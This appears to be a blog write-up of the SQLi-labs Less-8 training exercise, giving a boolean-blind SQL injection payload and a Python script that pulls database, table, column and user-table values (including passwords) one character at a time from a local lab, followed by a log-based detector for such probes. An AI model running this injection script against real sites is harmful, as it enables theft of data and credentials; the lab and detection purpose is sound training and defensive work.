sqlilabs less-8
2022-07-01 14:06:00 【It's always late at night.】
First, determine whether the parameter is numeric or string type.

Adding a character after the number still works, so it is a string-type parameter. Try constructing a payload again. Because this time the page only returns whether the query is correct or not, consider blind injection.

First determine the length of the database name.
Then determine the database name.

The functions used here: substr(content, n, m) takes m characters from content starting at position n, and length() returns the length of a string. The other key SQL statement is:

```
?id=1' and substr((select group_concat(table_name) from information_schema.tables where table_schema = database()),1,1)='u'--+
```
Doing this by hand is a lot of work; you can use Burp Suite or a script instead.
```python
import requests

# Less-8 only reveals whether the query succeeded ("You are in...") or not,
# so every fact is extracted one true/false question at a time.
url = 'http://localhost/sqlilabs/Less-8/?id=1\''
datalens = 0
datanamee = ''
sign = "You are in..........."   # text shown when the injected condition is true
tablename = ''
columnlist = ''
list1 = ['id', 'username', 'password', 'user', 'currentconnections', 'totalconnections']
valuelist = ''

# Database name length: ask length(database())=i for i in 0..9
for i in range(10):
    rl = str(i)
    lenurl = url + " and length(database())=" + rl + "--+"
    r = requests.get(lenurl)
    if sign in r.text:
        print("database len " + str(i))
        datalens = i + 1

# Database name: compare substr(database(), i, 1) against each candidate character
wordlist = "abcdefghijklmnopqrstuvwxyz"
for i in range(1, datalens):
    dataname = url + " and substr(database()," + str(i) + "," + "1)"
    for w in wordlist:
        datanames = dataname + "=" + "'" + w + "'" + "--+"
        r = requests.get(datanames)
        if sign in r.text:
            datanamee += w
print("database name " + datanamee)

# Table names, read character by character from the comma-separated group_concat result
wordlist2 = "abcdefghijklmnopqrstuvwxyz,"
for i in range(1, 100):
    tableurl1 = url + " and substr((select group_concat(table_name) from information_schema.tables where table_schema = database())," + str(i) + ",1)="
    for v in wordlist2:
        tableurl = tableurl1 + "\'" + v + "\'" + "--+"
        r = requests.get(tableurl)
        if sign in r.text:
            tablename += v
print("database table " + tablename)

# Column names of the users table
for i in range(1, 100):
    columnurl1 = url + " and substr((select group_concat(column_name) from information_schema.columns where table_name = \'users\' )," + str(i) + ",1)="
    for v in wordlist2:
        columnurl = columnurl1 + "\'" + v + "\'" + "--+"
        r = requests.get(columnurl)
        if sign in r.text:
            columnlist += v
print("database column " + columnlist)
print(list1)

# Row values: one column of list1 at a time, via group_concat over the users table
wordlist2 = "0123456789abcdefghijklmnopqrstuvwxyz,=-_/\\."
for n in range(6):
    for i in range(1, 200):
        valueurl1 = url + " and substr((select group_concat(" + list1[n] + ") from users )," + str(i) + ",1)="
        for v in wordlist2:
            valueurl = valueurl1 + "\'" + v + "\'" + "--+"
            r = requests.get(valueurl)
            if sign in r.text:
                valuelist += v
    print("database " + list1[n] + ' ' + valuelist)
    valuelist = ''
```
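The script above sends one request per candidate character, which leaves a very regular trail in the web server's access log. The detector below is an added example written for this page, not the post's code: it decodes each query-string value, flags the boolean-blind building blocks the post relies on (quote followed by AND, length()/substr(), information_schema, trailing comment), and counts probe patterns that repeat with only the guessed character or position changed. The log lines, IP addresses and indicator names are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed access-log lines (common log format) in the shape the
# character-by-character script above produces; this is not a real log.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jul/2022:14:06:01 +0800] "GET /sqlilabs/Less-8/?id=1 HTTP/1.1" 200 712
10.0.0.9 - - [01/Jul/2022:14:06:02 +0800] "GET /sqlilabs/Less-8/?id=1%27%20and%20length(database())=7--+ HTTP/1.1" 200 698
10.0.0.9 - - [01/Jul/2022:14:06:02 +0800] "GET /sqlilabs/Less-8/?id=1%27%20and%20length(database())=8--+ HTTP/1.1" 200 712
10.0.0.9 - - [01/Jul/2022:14:06:03 +0800] "GET /sqlilabs/Less-8/?id=1%27%20and%20substr(database(),1,1)=%27a%27--+ HTTP/1.1" 200 698
10.0.0.9 - - [01/Jul/2022:14:06:03 +0800] "GET /sqlilabs/Less-8/?id=1%27%20and%20substr(database(),1,1)=%27s%27--+ HTTP/1.1" 200 712
10.0.0.9 - - [01/Jul/2022:14:06:04 +0800] "GET /sqlilabs/Less-8/?id=1%27%20and%20substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),1,1)=%27e%27--+ HTTP/1.1" 200 712
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) ')
# The boolean-blind building blocks the post relies on, matched against the
# URL-decoded, lower-cased parameter value (indicator names are our own).
INDICATORS = {
    "quote_then_boolean": re.compile(r"'\s*(and|or)\b"),
    "length_or_substr": re.compile(r"\b(length|substr|substring|mid|ascii)\s*\("),
    "schema_enumeration": re.compile(r"information_schema\.(tables|columns)"),
    "comment_terminator": re.compile(r"--[\s+]*$"),
}

def classify_value(value):
    """Names of the indicators present in one query-string value (decoded again to catch double encoding)."""
    decoded = unquote_plus(value).lower()
    return sorted(n for n, rx in INDICATORS.items() if rx.search(decoded))

def skeleton(value):
    """Mask the guessed character and numeric positions so ...='a' and ...='s' collapse onto one pattern."""
    decoded = re.sub(r"=\s*'[^']*'", "='?'", unquote_plus(value).lower())
    return re.sub(r"\d+", "N", decoded)

def scan(log_text, min_siblings=2):
    """Per source IP: flagged requests, indicators seen, and probe patterns repeated with only the guess changed."""
    seen = defaultdict(lambda: {"flagged": 0, "indicators": set(), "skeletons": defaultdict(int)})
    for m in filter(None, map(REQUEST_RE.match, log_text.splitlines())):
        ip, target = m.groups()
        for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            hits = classify_value(value)
            if hits:
                seen[ip]["flagged"] += 1
                seen[ip]["indicators"].update(hits)
                seen[ip]["skeletons"][skeleton(value)] += 1
    return {ip: {"flagged": e["flagged"], "indicators": sorted(e["indicators"]),
                 "repeated_patterns": sum(c >= min_siblings for c in e["skeletons"].values())}
            for ip, e in seen.items()}
```

A single flagged request can be a false positive; the repeated_patterns count is the stronger signal, because legitimate clients do not re-send the same query with only one quoted character changed.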

As you can see, this blogger's programming is weak; it remains to be improved.